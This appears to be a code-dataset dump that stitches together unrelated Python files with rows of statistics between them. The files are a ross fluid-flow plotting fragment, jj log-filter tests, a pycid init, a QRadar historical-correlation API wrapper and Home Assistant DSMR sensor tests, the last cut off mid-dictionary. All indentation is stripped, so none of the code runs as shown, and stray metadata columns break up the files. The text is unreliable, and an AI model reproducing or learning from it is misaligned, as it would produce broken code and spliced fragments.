inner_radius_list = np.zeros(fluid_flow_object.ntheta)
pressure_list = np.zeros((theta.size, r.size))
for i in range(0, theta.size):
inner_radius = np.sqrt(
fluid_flow_object.xri[z][i] * fluid_flow_object.xri[z][i] + fluid_flow_object.yri[z][i] * fluid_flow_object.yri[z][i]
)
inner_radius_list[i] = inner_radius
for j in range(0, r.size):
if r_matrix[i][j] < inner_radius:
continue
pressure_list[i][j] = pressure_along_theta[i]
z_matrix[i][j] = pressure_along_theta[i] - min_pressure + 0.01
ax.contourf(theta_matrix, r_matrix, z_matrix, cmap="coolwarm")
ax.set_title("Pressure along Theta; Z=" + str(z))
return ax
def matplot_pressure_theta(fluid_flow_object, z=0, ax=None):
"""This function assembles pressure graphic in the theta direction for a given z,
using matplotlib.
Parameters
----------
fluid_flow_object: a FluidFlow object
z: int, optional
The distance along z-axis to be considered.
ax : matplotlib axes, optional
Axes in which the plot will be drawn.
Returns
-------
ax : matplotlib axes
Returns the axes object with the plot.
Examples
--------
>>> from ross.fluid_flow.fluid_flow import fluid_flow_example
>>> my_fluid_flow = fluid_flow_example()
>>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
array([[...
>>> ax = matplot_pressure_theta(my_fluid_flow, z=int(my_fluid_flow.nz/2))
>>> # to show the plots you can use:
>>> # plt.show()
"""
if (
not fluid_flow_object.numerical_pressure_matrix_available
and not fluid_flow_object.analytical_pressure_matrix_available
):
raise ValueError(
"Must calculate the pressure matrix. "
"Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
)
if ax is None:
ax = plt.gca()
if fluid_flow_object.numerical_pressure_matrix_available:
ax.plot(
fluid_flow_object.gama[z],
fluid_flow_object.p_mat_numerical[z],
"b",
label="Numerical pressure"
)
if fluid_flow_object.analytical_pressure_matrix_available:
ax.plot(
fluid_flow_object.gama[z],
fluid_flow_object.p_mat_analytical[z],
"r",
label="Analytical pressure",
)
ax.set_title("Pressure along Theta; Z=" + str(z))
ax.set_xlabel("Points along Theta")
ax.set_ylabel("Pressure")
return ax
| 37.193258
| 129
| 0.656697
| 2,301
| 16,551
| 4.462408
| 0.083877
| 0.149883
| 0.150467
| 0.031554
| 0.874075
| 0.83395
| 0.786229
| 0.762369
| 0.720101
| 0.680658
| 0
| 0.004434
| 0.236904
| 16,551
| 444
| 130
| 37.277027
| 0.808551
| 0.385475
| 0
| 0.452915
| 0
| 0
| 0.145758
| 0.040073
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040359
| false
| 0
| 0.013453
| 0
| 0.09417
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a0446a9b92286f87ee008094c0af913a0e74bc8
| 1,652
|
py
|
Python
|
tests/mock/test_system_log_filter.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 4
|
2020-09-08T08:14:21.000Z
|
2022-01-27T19:22:53.000Z
|
tests/mock/test_system_log_filter.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 19
|
2018-02-13T05:51:25.000Z
|
2022-03-27T22:48:11.000Z
|
tests/mock/test_system_log_filter.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 3
|
2017-11-17T13:25:23.000Z
|
2022-02-03T12:57:00.000Z
|
from unittest.mock import Mock, sentinel
import pytest
from jj.mock import SystemLogFilter
from .._test_utils.steps import given, then, when
from ..logs._log_record import TestLogRecord
@pytest.fixture()
def record():
return TestLogRecord(sentinel.message)
def test_log_filter(record: TestLogRecord):
with given:
log_filter = SystemLogFilter()
with when:
res = log_filter.filter(record)
with then:
assert res is True
def test_log_filter_request_without_header(record: TestLogRecord):
with given:
log_filter = SystemLogFilter()
record.jj_request = Mock(headers={})
with when:
res = log_filter.filter(record)
with then:
assert res is True
def test_log_filter_request_with_header(record: TestLogRecord):
with given:
log_filter = SystemLogFilter()
record.jj_request = Mock(headers={"x-jj-remote-mock": ""})
with when:
res = log_filter.filter(record)
with then:
assert res is False
def test_log_filter_response_without_header(record: TestLogRecord):
with given:
log_filter = SystemLogFilter()
record.jj_request = Mock(headers={})
record.jj_response = Mock()
with when:
res = log_filter.filter(record)
with then:
assert res is True
def test_log_filter_response_with_header(record: TestLogRecord):
with given:
log_filter = SystemLogFilter()
record.jj_request = Mock(headers={"x-jj-remote-mock": ""})
record.jj_response = Mock()
with when:
res = log_filter.filter(record)
with then:
assert res is False
| 22.026667
| 67
| 0.672518
| 203
| 1,652
| 5.26601
| 0.17734
| 0.126286
| 0.046773
| 0.074836
| 0.792329
| 0.762395
| 0.762395
| 0.713751
| 0.713751
| 0.713751
| 0
| 0
| 0.24092
| 1,652
| 74
| 68
| 22.324324
| 0.852472
| 0
| 0
| 0.734694
| 0
| 0
| 0.01937
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 1
| 0.122449
| false
| 0
| 0.102041
| 0.020408
| 0.244898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a33b96032b809efbf13c7d5a43aecfb300c3796
| 318
|
py
|
Python
|
pycid/random/__init__.py
|
sbenthall/pycid
|
114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf
|
[
"Apache-2.0"
] | 47
|
2021-02-17T15:43:51.000Z
|
2022-03-22T00:57:27.000Z
|
pycid/random/__init__.py
|
sbenthall/pycid
|
114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf
|
[
"Apache-2.0"
] | 57
|
2021-02-18T13:29:30.000Z
|
2022-02-22T23:12:07.000Z
|
pycid/random/__init__.py
|
sbenthall/pycid
|
114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf
|
[
"Apache-2.0"
] | 5
|
2021-03-08T18:45:17.000Z
|
2022-02-07T18:37:54.000Z
|
from pycid.random.random_cid import random_cid, random_cids # noqa
from pycid.random.random_cpd import RandomCPD # noqa
from pycid.random.random_dag import random_dag # noqa
from pycid.random.random_macid import random_macid, random_macids # noqa
from pycid.random.random_macidbase import random_macidbase # noqa
| 53
| 73
| 0.830189
| 48
| 318
| 5.270833
| 0.270833
| 0.177866
| 0.296443
| 0.41502
| 0.395257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116352
| 318
| 5
| 74
| 63.6
| 0.900356
| 0.075472
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0a38333ca36c4cd8768ce3ac1d4305569774fb0f
| 7,913
|
py
|
Python
|
qradar4py/endpoints/historical_correlation.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 10
|
2019-11-19T21:13:32.000Z
|
2021-11-17T19:35:53.000Z
|
qradar4py/endpoints/historical_correlation.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 2
|
2021-05-21T16:15:16.000Z
|
2021-07-20T12:34:49.000Z
|
qradar4py/endpoints/historical_correlation.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 6
|
2020-09-14T13:44:55.000Z
|
2021-11-17T19:35:55.000Z
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class HistoricalCorrelation(QRadarAPIEndpoint):
"""
The QRadar API endpoint group /historical_correlation and its endpoints.
UNDOCUMENTED
"""
__baseurl = 'historical_correlation/'
def __init__(self, url, header, verify):
super().__init__(urljoin(url, self.__baseurl),
header,
verify)
@request_vars('offense_id', 'fields')
def get_hc_offense_info(self, *, offense_id, fields=None, **kwargs):
"""
GET /historical_correlation/hc_offense_info
Retrieves a historical correlation instance information associated with given offense
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'hc_offense_info')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_event_rules(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_event_rules
Retrieves a list of common/event custom rules that can be added to a historical correlation
profile with a network_event_type of event (0).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_event_rules')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_event_saved_searches(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_event_saved_searches
Retrieves a list of non-aggregated event saved searches that can be added to a historical correlation
profile with a network_event_type of event (0).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_event_saved_searches')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_flow_rules(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_flow_rules
Retrieves a list of common/flow rules that can added to a historical correlation profile with a
network_event_type of flow (1).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_flow_rules')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_flow_saved_searches(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_flow_saved_searches
Retrieves a list of non-aggregated flow saved searches that can be added to a historical correlation
profile with a network_event_type of flow (1).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_flow_saved_searches')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('sort', 'fields', 'filter')
def get_profiles(self, *, Range=None, sort=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/profiles
Retrieves a list of historical correlation profiles
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_profiles(self, *, profileData, fields=None, **kwargs):
"""
POST /historical_correlation/profiles
Create a new historical correlation profile
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles')
return self._call('POST', function_endpoint, json=profileData, headers=headers, **kwargs)
@request_vars('fields')
def get_profiles_by_id(self, id, *, fields=None, **kwargs):
"""
GET /historical_correlation/profiles/{id}
Get a Historical Search Profile by Id
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles/{id}'.format(id=id))
return self._call('GET', function_endpoint, headers=headers, **kwargs)
def delete_profiles_by_id(self, id, **kwargs):
"""
DELETE /historical_correlation/profiles/{id}
Delete a Historical Correlation Profile by Id
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_profiles_by_id(self, id, *, profileData, fields=None, **kwargs):
"""
POST /historical_correlation/profiles/{id}
Update a historical correlation profile
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=profileData, headers=headers, **kwargs)
@request_vars('fields')
def post_profiles_runs_by_id(self, id, *, fields=None, **kwargs):
"""
POST /historical_correlation/profiles/{id}/runs
Causes the Historical Profile server to run a given historical correlation profile.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles/{id}/runs'.format(id=id))
return self._call('POST', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('sort', 'fields', 'filter')
def get_profiles_runs_by_id(self, id, *, Range=None, sort=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/profiles/{id}/runs
Retrieves a collection of historical correlation profile run structure for a given profile id.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles/{id}/runs'.format(id=id))
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@request_vars('fields')
def get_profiles_id_runs_by_run_id(self, id, run_id, *, fields=None, **kwargs):
"""
GET /historical_correlation/profiles/{id}/runs/{run_id}
Retrieves a historical correlation profile run structure for a given profile running id.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles/{id}/runs/{run_id}'.format(id=id, run_id=run_id))
return self._call('GET', function_endpoint, headers=headers, **kwargs)
| 46.274854
| 110
| 0.664982
| 898
| 7,913
| 5.655902
| 0.106904
| 0.111636
| 0.063989
| 0.071668
| 0.847411
| 0.838354
| 0.799567
| 0.787753
| 0.735184
| 0.683599
| 0
| 0.00112
| 0.210034
| 7,913
| 170
| 111
| 46.547059
| 0.81139
| 0.254012
| 0
| 0.6
| 0
| 0
| 0.131737
| 0.024326
| 0
| 0
| 0
| 0
| 0
| 1
| 0.175
| false
| 0
| 0.05
| 0
| 0.4125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6aa38734b9182e93c53429a4848530d6304e600b
| 54
|
py
|
Python
|
Uncommon/Python/__init__.py
|
MattiKemp/Data-Structures-And-Algorithms
|
37a4eb4f092f5a058643ef5ac302fe16d97f84dc
|
[
"Unlicense"
] | null | null | null |
Uncommon/Python/__init__.py
|
MattiKemp/Data-Structures-And-Algorithms
|
37a4eb4f092f5a058643ef5ac302fe16d97f84dc
|
[
"Unlicense"
] | null | null | null |
Uncommon/Python/__init__.py
|
MattiKemp/Data-Structures-And-Algorithms
|
37a4eb4f092f5a058643ef5ac302fe16d97f84dc
|
[
"Unlicense"
] | null | null | null |
from . import DataStructures
from . import Algorithms
| 18
| 28
| 0.814815
| 6
| 54
| 7.333333
| 0.666667
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 54
| 2
| 29
| 27
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6accf7c40da0f0c529732d9106eceb36ae89d950
| 24,037
|
py
|
Python
|
tests/components/dsmr/test_sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 7
|
2019-08-15T13:36:58.000Z
|
2020-03-18T10:46:29.000Z
|
tests/components/dsmr/test_sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 87
|
2020-07-15T13:43:35.000Z
|
2022-03-23T07:43:10.000Z
|
tests/components/dsmr/test_sensor.py
|
winning1120xx/home-assistant
|
53d4c0ce2d374b5e97bbdc37742656c27adf8eea
|
[
"Apache-2.0"
] | 11
|
2020-12-16T13:48:14.000Z
|
2022-02-01T00:28:05.000Z
|
"""Test for DSMR components.
Tests setup of the DSMR component and ensure incoming telegrams cause
Entity to be updated with new values.
"""
import asyncio
import datetime
from decimal import Decimal
from itertools import chain, repeat
from unittest.mock import DEFAULT, MagicMock
from homeassistant import config_entries
from homeassistant.components.dsmr.const import DOMAIN
from homeassistant.components.sensor import (
ATTR_STATE_CLASS,
DOMAIN as SENSOR_DOMAIN,
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ICON,
ATTR_UNIT_OF_MEASUREMENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_GAS,
DEVICE_CLASS_POWER,
ENERGY_KILO_WATT_HOUR,
STATE_UNKNOWN,
VOLUME_CUBIC_METERS,
)
from homeassistant.helpers import entity_registry as er
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry, patch
async def test_setup_platform(hass, dsmr_connection_fixture):
"""Test setup of platform."""
async_add_entities = MagicMock()
entry_data = {
"platform": DOMAIN,
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
serial_data = {"serial_id": "1234", "serial_id_gas": "5678"}
with patch(
"homeassistant.components.dsmr.async_setup_entry", return_value=True
), patch(
"homeassistant.components.dsmr.config_flow._validate_dsmr_connection",
return_value=serial_data,
):
assert await async_setup_component(
hass, SENSOR_DOMAIN, {SENSOR_DOMAIN: entry_data}
)
await hass.async_block_till_done()
assert not async_add_entities.called
# Check config entry
conf_entries = hass.config_entries.async_entries(DOMAIN)
assert len(conf_entries) == 1
entry = conf_entries[0]
assert entry.state == config_entries.ConfigEntryState.LOADED
assert entry.data == {**entry_data, **serial_data}
async def test_default_setup(hass, dsmr_connection_fixture):
"""Test the default setup."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
from dsmr_parser.obis_references import (
CURRENT_ELECTRICITY_USAGE,
ELECTRICITY_ACTIVE_TARIFF,
GAS_METER_READING,
)
from dsmr_parser.objects import CosemObject, MBusObject
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
"serial_id_gas": "5678",
}
entry_options = {
"time_between_update": 0,
}
telegram = {
CURRENT_ELECTRICITY_USAGE: CosemObject(
[{"value": Decimal("0.0"), "unit": ENERGY_KILO_WATT_HOUR}]
),
ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
GAS_METER_READING: MBusObject(
[
{"value": datetime.datetime.fromtimestamp(1551642213)},
{"value": Decimal(745.695), "unit": "m3"},
]
),
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
registry = er.async_get(hass)
entry = registry.async_get("sensor.power_consumption")
assert entry
assert entry.unique_id == "1234_Power_Consumption"
entry = registry.async_get("sensor.gas_consumption")
assert entry
assert entry.unique_id == "5678_Gas_Consumption"
telegram_callback = connection_factory.call_args_list[0][0][2]
# make sure entities have been created and return 'unknown' state
power_consumption = hass.states.get("sensor.power_consumption")
assert power_consumption.state == STATE_UNKNOWN
assert power_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_POWER
assert power_consumption.attributes.get(ATTR_ICON) is None
assert power_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_MEASUREMENT
assert power_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) is None
# simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
telegram_callback(telegram)
# after receiving telegram entities need to have the chance to update
await asyncio.sleep(0)
# ensure entities have new state value after incoming telegram
power_consumption = hass.states.get("sensor.power_consumption")
assert power_consumption.state == "0.0"
assert (
power_consumption.attributes.get("unit_of_measurement") == ENERGY_KILO_WATT_HOUR
)
# tariff should be translated in human readable and have no unit
power_tariff = hass.states.get("sensor.power_tariff")
assert power_tariff.state == "low"
assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
# check if gas consumption is parsed correctly
gas_consumption = hass.states.get("sensor.gas_consumption")
assert gas_consumption.state == "745.695"
assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
assert (
gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
)
assert (
gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
)
async def test_setup_only_energy(hass, dsmr_connection_fixture):
"""Test the default setup."""
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
registry = er.async_get(hass)
entry = registry.async_get("sensor.power_consumption")
assert entry
assert entry.unique_id == "1234_Power_Consumption"
entry = registry.async_get("sensor.gas_consumption")
assert not entry
async def test_v4_meter(hass, dsmr_connection_fixture):
"""Test if v4 meter is correctly parsed."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
from dsmr_parser.obis_references import (
ELECTRICITY_ACTIVE_TARIFF,
HOURLY_GAS_METER_READING,
)
from dsmr_parser.objects import CosemObject, MBusObject
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "4",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
"serial_id_gas": "5678",
}
entry_options = {
"time_between_update": 0,
}
telegram = {
HOURLY_GAS_METER_READING: MBusObject(
[
{"value": datetime.datetime.fromtimestamp(1551642213)},
{"value": Decimal(745.695), "unit": "m3"},
]
),
ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
telegram_callback = connection_factory.call_args_list[0][0][2]
# simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
telegram_callback(telegram)
# after receiving telegram entities need to have the chance to update
await asyncio.sleep(0)
# tariff should be translated in human readable and have no unit
power_tariff = hass.states.get("sensor.power_tariff")
assert power_tariff.state == "low"
assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
# check if gas consumption is parsed correctly
gas_consumption = hass.states.get("sensor.gas_consumption")
assert gas_consumption.state == "745.695"
assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
assert gas_consumption.attributes.get("unit_of_measurement") == VOLUME_CUBIC_METERS
assert (
gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
)
assert (
gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
)
async def test_v5_meter(hass, dsmr_connection_fixture):
"""Test if v5 meter is correctly parsed."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
from dsmr_parser.obis_references import (
ELECTRICITY_ACTIVE_TARIFF,
HOURLY_GAS_METER_READING,
)
from dsmr_parser.objects import CosemObject, MBusObject
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "5",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
"serial_id_gas": "5678",
}
entry_options = {
"time_between_update": 0,
}
telegram = {
HOURLY_GAS_METER_READING: MBusObject(
[
{"value": datetime.datetime.fromtimestamp(1551642213)},
{"value": Decimal(745.695), "unit": "m3"},
]
),
ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
telegram_callback = connection_factory.call_args_list[0][0][2]
# simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
telegram_callback(telegram)
# after receiving telegram entities need to have the chance to update
await asyncio.sleep(0)
# tariff should be translated in human readable and have no unit
power_tariff = hass.states.get("sensor.power_tariff")
assert power_tariff.state == "low"
assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
# check if gas consumption is parsed correctly
gas_consumption = hass.states.get("sensor.gas_consumption")
assert gas_consumption.state == "745.695"
assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
assert (
gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
)
assert (
gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
)
async def test_luxembourg_meter(hass, dsmr_connection_fixture):
"""Test if v5 meter is correctly parsed."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
from dsmr_parser.obis_references import (
HOURLY_GAS_METER_READING,
LUXEMBOURG_ELECTRICITY_DELIVERED_TARIFF_GLOBAL,
LUXEMBOURG_ELECTRICITY_USED_TARIFF_GLOBAL,
)
from dsmr_parser.objects import CosemObject, MBusObject
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "5L",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
"serial_id_gas": "5678",
}
entry_options = {
"time_between_update": 0,
}
telegram = {
HOURLY_GAS_METER_READING: MBusObject(
[
{"value": datetime.datetime.fromtimestamp(1551642213)},
{"value": Decimal(745.695), "unit": "m3"},
]
),
LUXEMBOURG_ELECTRICITY_USED_TARIFF_GLOBAL: CosemObject(
[{"value": Decimal(123.456), "unit": ENERGY_KILO_WATT_HOUR}]
),
LUXEMBOURG_ELECTRICITY_DELIVERED_TARIFF_GLOBAL: CosemObject(
[{"value": Decimal(654.321), "unit": ENERGY_KILO_WATT_HOUR}]
),
}
mock_entry = MockConfigEntry(
domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
)
mock_entry.add_to_hass(hass)
await hass.config_entries.async_setup(mock_entry.entry_id)
await hass.async_block_till_done()
telegram_callback = connection_factory.call_args_list[0][0][2]
# simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
telegram_callback(telegram)
# after receiving telegram entities need to have the chance to update
await asyncio.sleep(0)
power_tariff = hass.states.get("sensor.energy_consumption_total")
assert power_tariff.state == "123.456"
assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_ENERGY
assert power_tariff.attributes.get(ATTR_ICON) is None
assert power_tariff.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
assert (
power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ENERGY_KILO_WATT_HOUR
)
power_tariff = hass.states.get("sensor.energy_production_total")
assert power_tariff.state == "654.321"
assert power_tariff.attributes.get("unit_of_measurement") == ENERGY_KILO_WATT_HOUR
# check if gas consumption is parsed correctly
gas_consumption = hass.states.get("sensor.gas_consumption")
assert gas_consumption.state == "745.695"
assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
assert (
gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
)
assert (
gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
)
async def test_belgian_meter(hass, dsmr_connection_fixture):
"""Test if Belgian meter is correctly parsed."""
(connection_factory, transport, protocol) = dsmr_connection_fixture
from dsmr_parser.obis_references import (
BELGIUM_HOURLY_GAS_METER_READING,
ELECTRICITY_ACTIVE_TARIFF,
)
from dsmr_parser.objects import CosemObject, MBusObject
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "5B",
"precision": 4,
"reconnect_interval": 30,
"serial_id": "1234",
"serial_id_gas": "5678",
}
entry_options = {
"time_between_update": 0,
}
telegram = {
